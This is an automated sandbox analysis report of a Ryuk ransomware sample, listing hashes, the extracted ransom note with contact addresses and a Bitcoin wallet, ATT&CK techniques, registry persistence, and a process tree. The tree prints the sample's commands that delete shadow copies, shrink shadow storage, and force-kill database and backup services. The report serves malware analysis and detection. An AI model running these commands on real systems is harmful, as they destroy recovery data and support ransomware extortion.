ryuk | 113af75f13547be184822f1268f984b79f35965a1b1f963d23b50a09741b0aec

Analysis

max time kernel
297s
max time network
59s
platform
windows7_x64
resource
win7v20210408
submitted
22-04-2021 09:33

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ignorant-bike.exe
Size

170KB
MD5

29340643ca2e6677c19e1d3bf351d654
SHA1

1581fe76e3c96dc33182daafd09c8cf5c17004e0
SHA256

113af75f13547be184822f1268f984b79f35965a1b1f963d23b50a09741b0aec
SHA512

cf505569f38f7c2d5200faba24bb0713eaba920ebf073d641eb07eda136563258e1ca2c95ff9ea03f3760c77cff9f543c7905a39e00cfe3c89ef79a5cb3305a0

Score

10^/10

ryuk persistence ransomware spyware stealer

Malware Config

Extracted

Path

C:\RyukReadMe.txt

Family

ryuk

Ransom Note

Your network has been penetrated. All files on each host in the network have been encrypted with a strong algorithm. Backups were either encrypted or deleted or backup disks were formatted. Shadow copies also removed, so F8 or any other methods may damage encrypted data but not recover. We exclusively have decryption software for your situation No decryption software is available in the public. DO NOT RESET OR SHUTDOWN - files may be damaged. DO NOT RENAME OR MOVE the encrypted and readme files. DO NOT DELETE readme files. This may lead to the impossibility of recovery of the certain files. To get info (decrypt your files) contact us at [email protected] or [email protected] BTC wallet: 1KURvApbe1yC7qYxkkkvtdZ7hrNjdp18sQ Ryuk No system is safe

Emails

[email protected]

Wallets

1KURvApbe1yC7qYxkkkvtdZ7hrNjdp18sQ

Signatures

Ryuk
Ransomware distributed via existing botnets, often Trickbot or Emotet.
ransomware ryuk
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

reg.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Windows\CurrentVersion\Run\svchos = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ignorant-bike.exe"	reg.exe

Enumerates connected drives 3 TTPs 18 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

vssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exe

description	ioc	process
File opened (read-only)	\??\E:	vssadmin.exe
File opened (read-only)	\??\F:	vssadmin.exe
File opened (read-only)	\??\f:	vssadmin.exe
File opened (read-only)	\??\G:	vssadmin.exe
File opened (read-only)	\??\G:	vssadmin.exe
File opened (read-only)	\??\h:	vssadmin.exe
File opened (read-only)	\??\D:	vssadmin.exe
File opened (read-only)	\??\E:	vssadmin.exe
File opened (read-only)	\??\e:	vssadmin.exe
File opened (read-only)	\??\f:	vssadmin.exe
File opened (read-only)	\??\F:	vssadmin.exe
File opened (read-only)	\??\h:	vssadmin.exe
File opened (read-only)	\??\H:	vssadmin.exe
File opened (read-only)	\??\D:	vssadmin.exe
File opened (read-only)	\??\e:	vssadmin.exe
File opened (read-only)	\??\g:	vssadmin.exe
File opened (read-only)	\??\g:	vssadmin.exe
File opened (read-only)	\??\H:	vssadmin.exe

Drops file in Program Files directory 64 IoCs

Processes:

taskhost.exeDwm.exe

description	ioc	process
File opened for modification	C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14753_.GIF	taskhost.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Microsoft.Office.BusinessData.xml	Dwm.exe
File opened for modification	C:\Program Files (x86)\Common Files\microsoft shared\VSTA\AppInfoDocument\Microsoft.VisualStudio.Tools.Office.AppInfoDocument\RyukReadMe.txt	taskhost.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\FD02115_.WMF	taskhost.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099176.WMF	taskhost.exe
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\title_trans_notes.wmv	Dwm.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\FD02071_.WMF	Dwm.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\NEWS98.POC	Dwm.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core-multitabs_zh_CN.jar	taskhost.exe
File opened for modification	C:\Program Files\Java\jre7\lib\fontconfig.bfc	taskhost.exe
File opened for modification	C:\Program Files (x86)\Common Files\System\ado\msado20.tlb	taskhost.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\he\LC_MESSAGES\vlc.mo	taskhost.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\doclib.gif	Dwm.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\CLASSIC2.WMF	Dwm.exe
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\background.png	taskhost.exe
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\TravelIntroToMain_PAL.wmv	taskhost.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.core.services_1.2.1.v20140808-1251.jar	taskhost.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Europe\Zaporozhye	taskhost.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\RyukReadMe.txt	Dwm.exe
File opened for modification	C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\BLUEPRNT\RyukReadMe.txt	Dwm.exe
File opened for modification	C:\Program Files (x86)\Common Files\microsoft shared\TRANSLAT\ESEN\RyukReadMe.txt	Dwm.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\TN01165_.WMF	Dwm.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\PDIR32F.GIF	Dwm.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FormsHomePageStyle.css	Dwm.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\El_Aaiun	taskhost.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-modules-profiler-attach.xml	taskhost.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-host-remote.xml	Dwm.exe
File opened for modification	C:\Program Files\Java\jre7\lib\charsets.jar	Dwm.exe
File opened for modification	C:\Program Files (x86)\Common Files\System\Ole DB\sqloledb.rll	Dwm.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Casual.css	Dwm.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0152558.WMF	taskhost.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\Certificates\Verisign\Components\RyukReadMe.txt	Dwm.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Desert\HEADER.GIF	Dwm.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\day-of-week-16.png	Dwm.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4_default_win7.css	Dwm.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\mscss7cm_en.dub	taskhost.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\DGWEBHD.XML	taskhost.exe
File opened for modification	C:\Program Files (x86)\Common Files\microsoft shared\GRPHFLT\MS.CGM	Dwm.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21299_.GIF	Dwm.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\WPULQT98.POC	Dwm.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\tesselate.x3d	taskhost.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\WB01300_.GIF	taskhost.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\Discussion.gta	taskhost.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\PDIR8F.GIF	taskhost.exe
File opened for modification	C:\Program Files\Java\jre7\lib\fonts\LucidaBrightItalic.ttf	Dwm.exe
File opened for modification	C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\RICEPAPR\RICEPAPR.ELM	taskhost.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\LINES\BD21334_.GIF	taskhost.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\BrightOrange\TAB_OFF.GIF	Dwm.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\rtf_decreaseindent.gif	Dwm.exe
File opened for modification	C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\RyukReadMe.txt	Dwm.exe
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\RyukReadMe.txt	taskhost.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\feedback.gif	taskhost.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMANIAN.TXT	taskhost.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-threaddump.xml	Dwm.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\RyukReadMe.txt	taskhost.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\America\Kentucky\Monticello	taskhost.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0153087.WMF	taskhost.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME22.CSS	Dwm.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.updatechecker_1.1.200.v20131119-0908.jar	taskhost.exe
File opened for modification	C:\Program Files\Java\jre7\lib\fonts\LucidaBrightItalic.ttf	taskhost.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Bold.otf	taskhost.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Qyzylorda	Dwm.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ui.sdk.scheduler.nl_ja_4.4.0.v20140623020002.jar	Dwm.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Microsoft.Office.Interop.InfoPath.SemiTrust.xml	Dwm.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Interacts with shadow copies 2 TTPs 15 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1107

Inhibit System Recovery

T1490

Processes:

vssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exe

pid	process
2912	vssadmin.exe
2664	vssadmin.exe
3152	vssadmin.exe
3756	vssadmin.exe
2240	vssadmin.exe
2460	vssadmin.exe
548	vssadmin.exe
2492	vssadmin.exe
2856	vssadmin.exe
3792	vssadmin.exe
3128	vssadmin.exe
3124	vssadmin.exe
3676	vssadmin.exe
2356	vssadmin.exe
3100	vssadmin.exe

Kills process with taskkill 44 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid	process
2792	taskkill.exe
2852	taskkill.exe
2912	taskkill.exe
2068	taskkill.exe
3012	taskkill.exe
2076	taskkill.exe
388	taskkill.exe
1108	taskkill.exe
440	taskkill.exe
2488	taskkill.exe
3288	taskkill.exe
1240	taskkill.exe
1688	taskkill.exe
1300	taskkill.exe
2452	taskkill.exe
2664	taskkill.exe
2952	taskkill.exe
3336	taskkill.exe
1384	taskkill.exe
2172	taskkill.exe
2388	taskkill.exe
2368	taskkill.exe
2836	taskkill.exe
2124	taskkill.exe
924	taskkill.exe
1472	taskkill.exe
3084	taskkill.exe
916	taskkill.exe
1056	taskkill.exe
1472	taskkill.exe
3024	taskkill.exe
2860	taskkill.exe
3196	taskkill.exe
316	taskkill.exe
2240	taskkill.exe
2528	taskkill.exe
3160	taskkill.exe
3248	taskkill.exe
1568	taskkill.exe
944	taskkill.exe
2320	taskkill.exe
2576	taskkill.exe
2160	taskkill.exe
688	taskkill.exe

Runs net.exe
Suspicious behavior: EnumeratesProcesses 5 IoCs

Processes:

ignorant-bike.exe

pid process

484 ignorant-bike.exe
484 ignorant-bike.exe
484 ignorant-bike.exe
484 ignorant-bike.exe
484 ignorant-bike.exe
Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

ignorant-bike.exe

pid process

484 ignorant-bike.exe

pid	process
484	ignorant-bike.exe
484	ignorant-bike.exe
484	ignorant-bike.exe
484	ignorant-bike.exe
484	ignorant-bike.exe

pid	process
484	ignorant-bike.exe

Suspicious use of AdjustPrivilegeToken 48 IoCs

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.execonhost.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exeignorant-bike.exevssvc.exe

description	pid	process
Token: SeDebugPrivilege	1056	taskkill.exe
Token: SeDebugPrivilege	688	taskkill.exe
Token: SeDebugPrivilege	1240	taskkill.exe
Token: SeDebugPrivilege	1568	taskkill.exe
Token: SeDebugPrivilege	316	taskkill.exe
Token: SeDebugPrivilege	1472	taskkill.exe
Token: SeDebugPrivilege	388	taskkill.exe
Token: SeDebugPrivilege	944	taskkill.exe
Token: SeDebugPrivilege	916	conhost.exe
Token: SeDebugPrivilege	1384	taskkill.exe
Token: SeDebugPrivilege	1688	taskkill.exe
Token: SeDebugPrivilege	1300	taskkill.exe
Token: SeDebugPrivilege	2076	taskkill.exe
Token: SeDebugPrivilege	440	taskkill.exe
Token: SeDebugPrivilege	1108	taskkill.exe
Token: SeDebugPrivilege	2124	taskkill.exe
Token: SeDebugPrivilege	2240	taskkill.exe
Token: SeDebugPrivilege	2172	taskkill.exe
Token: SeDebugPrivilege	2320	taskkill.exe
Token: SeDebugPrivilege	2388	taskkill.exe
Token: SeDebugPrivilege	2452	taskkill.exe
Token: SeDebugPrivilege	2488	taskkill.exe
Token: SeDebugPrivilege	2576	taskkill.exe
Token: SeDebugPrivilege	2664	taskkill.exe
Token: SeDebugPrivilege	2852	taskkill.exe
Token: SeDebugPrivilege	2792	taskkill.exe
Token: SeDebugPrivilege	2912	taskkill.exe
Token: SeDebugPrivilege	2952	taskkill.exe
Token: SeDebugPrivilege	3024	taskkill.exe
Token: SeDebugPrivilege	2160	taskkill.exe
Token: SeDebugPrivilege	924	taskkill.exe
Token: SeDebugPrivilege	2836	taskkill.exe
Token: SeDebugPrivilege	2368	taskkill.exe
Token: SeDebugPrivilege	2860	taskkill.exe
Token: SeDebugPrivilege	2068	taskkill.exe
Token: SeDebugPrivilege	3012	taskkill.exe
Token: SeDebugPrivilege	2528	taskkill.exe
Token: SeDebugPrivilege	1472	taskkill.exe
Token: SeDebugPrivilege	3084	taskkill.exe
Token: SeDebugPrivilege	3288	taskkill.exe
Token: SeDebugPrivilege	3160	taskkill.exe
Token: SeDebugPrivilege	3196	taskkill.exe
Token: SeDebugPrivilege	3248	taskkill.exe
Token: SeDebugPrivilege	3336	taskkill.exe
Token: SeDebugPrivilege	484	ignorant-bike.exe
Token: SeBackupPrivilege	3740	vssvc.exe
Token: SeRestorePrivilege	3740	vssvc.exe
Token: SeAuditPrivilege	3740	vssvc.exe

Suspicious use of UnmapMainImage 2 IoCs

Processes:

taskhost.exeDwm.exe

pid process

1112 taskhost.exe
1168 Dwm.exe

pid	process
1112	taskhost.exe
1168	Dwm.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

ignorant-bike.exe

description	pid	process	target process
PID 484 wrote to memory of 1240	484	ignorant-bike.exe	taskkill.exe
PID 484 wrote to memory of 1240	484	ignorant-bike.exe	taskkill.exe
PID 484 wrote to memory of 1240	484	ignorant-bike.exe	taskkill.exe
PID 484 wrote to memory of 1568	484	ignorant-bike.exe	taskkill.exe
PID 484 wrote to memory of 1568	484	ignorant-bike.exe	taskkill.exe
PID 484 wrote to memory of 1568	484	ignorant-bike.exe	taskkill.exe
PID 484 wrote to memory of 316	484	ignorant-bike.exe	taskkill.exe
PID 484 wrote to memory of 316	484	ignorant-bike.exe	taskkill.exe
PID 484 wrote to memory of 316	484	ignorant-bike.exe	taskkill.exe
PID 484 wrote to memory of 688	484	ignorant-bike.exe	taskkill.exe
PID 484 wrote to memory of 688	484	ignorant-bike.exe	taskkill.exe
PID 484 wrote to memory of 688	484	ignorant-bike.exe	taskkill.exe
PID 484 wrote to memory of 1056	484	ignorant-bike.exe	taskkill.exe
PID 484 wrote to memory of 1056	484	ignorant-bike.exe	taskkill.exe
PID 484 wrote to memory of 1056	484	ignorant-bike.exe	taskkill.exe
PID 484 wrote to memory of 1472	484	ignorant-bike.exe	taskkill.exe
PID 484 wrote to memory of 1472	484	ignorant-bike.exe	taskkill.exe
PID 484 wrote to memory of 1472	484	ignorant-bike.exe	taskkill.exe
PID 484 wrote to memory of 388	484	ignorant-bike.exe	taskkill.exe
PID 484 wrote to memory of 388	484	ignorant-bike.exe	taskkill.exe
PID 484 wrote to memory of 388	484	ignorant-bike.exe	taskkill.exe
PID 484 wrote to memory of 944	484	ignorant-bike.exe	taskkill.exe
PID 484 wrote to memory of 944	484	ignorant-bike.exe	taskkill.exe
PID 484 wrote to memory of 944	484	ignorant-bike.exe	taskkill.exe
PID 484 wrote to memory of 916	484	ignorant-bike.exe	conhost.exe
PID 484 wrote to memory of 916	484	ignorant-bike.exe	conhost.exe
PID 484 wrote to memory of 916	484	ignorant-bike.exe	conhost.exe
PID 484 wrote to memory of 1384	484	ignorant-bike.exe	taskkill.exe
PID 484 wrote to memory of 1384	484	ignorant-bike.exe	taskkill.exe
PID 484 wrote to memory of 1384	484	ignorant-bike.exe	taskkill.exe
PID 484 wrote to memory of 1688	484	ignorant-bike.exe	taskkill.exe
PID 484 wrote to memory of 1688	484	ignorant-bike.exe	taskkill.exe
PID 484 wrote to memory of 1688	484	ignorant-bike.exe	taskkill.exe
PID 484 wrote to memory of 1300	484	ignorant-bike.exe	taskkill.exe
PID 484 wrote to memory of 1300	484	ignorant-bike.exe	taskkill.exe
PID 484 wrote to memory of 1300	484	ignorant-bike.exe	taskkill.exe
PID 484 wrote to memory of 1108	484	ignorant-bike.exe	taskkill.exe
PID 484 wrote to memory of 1108	484	ignorant-bike.exe	taskkill.exe
PID 484 wrote to memory of 1108	484	ignorant-bike.exe	taskkill.exe
PID 484 wrote to memory of 440	484	ignorant-bike.exe	taskkill.exe
PID 484 wrote to memory of 440	484	ignorant-bike.exe	taskkill.exe
PID 484 wrote to memory of 440	484	ignorant-bike.exe	taskkill.exe
PID 484 wrote to memory of 2076	484	ignorant-bike.exe	taskkill.exe
PID 484 wrote to memory of 2076	484	ignorant-bike.exe	taskkill.exe
PID 484 wrote to memory of 2076	484	ignorant-bike.exe	taskkill.exe
PID 484 wrote to memory of 2124	484	ignorant-bike.exe	taskkill.exe
PID 484 wrote to memory of 2124	484	ignorant-bike.exe	taskkill.exe
PID 484 wrote to memory of 2124	484	ignorant-bike.exe	taskkill.exe
PID 484 wrote to memory of 2172	484	ignorant-bike.exe	taskkill.exe
PID 484 wrote to memory of 2172	484	ignorant-bike.exe	taskkill.exe
PID 484 wrote to memory of 2172	484	ignorant-bike.exe	taskkill.exe
PID 484 wrote to memory of 2240	484	ignorant-bike.exe	taskkill.exe
PID 484 wrote to memory of 2240	484	ignorant-bike.exe	taskkill.exe
PID 484 wrote to memory of 2240	484	ignorant-bike.exe	taskkill.exe
PID 484 wrote to memory of 2320	484	ignorant-bike.exe	taskkill.exe
PID 484 wrote to memory of 2320	484	ignorant-bike.exe	taskkill.exe
PID 484 wrote to memory of 2320	484	ignorant-bike.exe	taskkill.exe
PID 484 wrote to memory of 2388	484	ignorant-bike.exe	taskkill.exe
PID 484 wrote to memory of 2388	484	ignorant-bike.exe	taskkill.exe
PID 484 wrote to memory of 2388	484	ignorant-bike.exe	taskkill.exe
PID 484 wrote to memory of 2452	484	ignorant-bike.exe	taskkill.exe
PID 484 wrote to memory of 2452	484	ignorant-bike.exe	taskkill.exe
PID 484 wrote to memory of 2452	484	ignorant-bike.exe	taskkill.exe
PID 484 wrote to memory of 2488	484	ignorant-bike.exe	taskkill.exe

C:\Windows\system32\Dwm.exe
"C:\Windows\system32\Dwm.exe"
1⤵
- Drops file in Program Files directory
- Suspicious use of UnmapMainImage
PID:1168

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\users\Public\window.bat"
2⤵
PID:1388

C:\Windows\system32\vssadmin.exe
vssadmin Delete Shadows /all /quiet
3⤵
- Interacts with shadow copies
PID:3756

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB
3⤵
- Interacts with shadow copies
PID:548

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
3⤵
- Interacts with shadow copies
PID:2492

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB
3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2356

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2856

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:3792

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2240

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2912

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2664

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2460

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:3100

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:3152

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:3128

C:\Windows\system32\vssadmin.exe
vssadmin Delete Shadows /all /quiet
3⤵
- Interacts with shadow copies
PID:3124

C:\Windows\system32\taskhost.exe
"taskhost.exe"
1⤵
- Drops file in Program Files directory
- Suspicious use of UnmapMainImage
PID:1112

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\users\Public\window.bat"
2⤵
PID:3112

C:\Windows\system32\vssadmin.exe
vssadmin Delete Shadows /all /quiet
3⤵
- Interacts with shadow copies
PID:3676

C:\Users\Admin\AppData\Local\Temp\ignorant-bike.exe
"C:\Users\Admin\AppData\Local\Temp\ignorant-bike.exe"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:484

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM zoolz.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1240

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM agntsvc.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1568

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM dbeng50.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:316

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM dbsnmp.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:688

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM encsvc.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1056

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM excel.exe /F
2⤵
- Kills process with taskkill
PID:1472

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM firefoxconfig.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:388

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM infopath.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:944

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM isqlplussvc.exe /F
2⤵
- Kills process with taskkill
PID:916

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM msaccess.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1384

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM msftesql.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1688

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM mspub.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1300

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM mydesktopqos.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1108

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM mydesktopservice.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:440

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM mysqld-nt.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2124

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM mysqld.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2076

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM mysqld-opt.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2172

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM ocautoupds.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2240

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM ocomm.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2320

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM ocssd.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2388

C:\Windows\System32\taskkill.exe
